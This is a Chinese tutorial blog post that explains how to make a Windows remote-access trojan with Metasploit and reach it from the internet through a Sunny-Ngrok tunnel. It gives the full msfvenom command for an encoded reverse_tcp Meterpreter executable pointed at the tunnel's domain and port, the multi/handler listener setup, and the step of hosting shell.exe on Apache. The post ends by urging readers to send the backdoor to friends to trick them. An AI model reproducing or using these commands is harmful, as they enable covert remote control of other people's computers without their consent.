渗透测试(二)-MSF制作Windows远控木马(外网篇)

  • A+
所属分类:教程

1. Sunny-Ngrok 开通隧道

  1. 首先在官网注册会员
  2. 登陆
  3. 选择要开通的服务器
  4. 这里我们选择美国Ngrok免费服务器
渗透测试(二)-MSF制作Windows远控木马(外网篇)
渗透测试(二)-MSF制作Windows远控木马(外网篇)

选择tcp协议,填一个可以使用的端口号。

渗透测试(二)-MSF制作Windows远控木马(外网篇)

开通隧道后可以在 隧道管理 中看到自己的隧道信息:

记住这里的 隧道id赠送域名 以及 隧道端口,下面会用到。

渗透测试(二)-MSF制作Windows远控木马(外网篇)

2. 启动隧道

首先在kali linux中下载对应的客户端,选择Linux 64位版本。

渗透测试(二)-MSF制作Windows远控木马(外网篇)

启动隧道:

./sunny clientid 隧道id

启动多个隧道:

./sunny clientid 隧道id,隧道id

要想后台运行可以使用 setsid 命令:

setsid ./sunny clientid 隧道id &

隧道连接成功后会显示:

渗透测试(二)-MSF制作Windows远控木马(外网篇)

3. 生成后门

sudo su
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10716 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/shell.exe

这里和内网渗透的区别就是:将LHOST换成隧道的域名地址,将LPORT换成隧道端口。

如果想要在软件中绑定后门,按照 MSF制作Windows远控木马(内网篇) 文中第7步就行,注意修改LHOST和LPORT

4. 监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 10716
run

5. 下载后门

同样打开apache服务,下载后门,然后就可以发给你的小伙伴们去坑他们了!

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: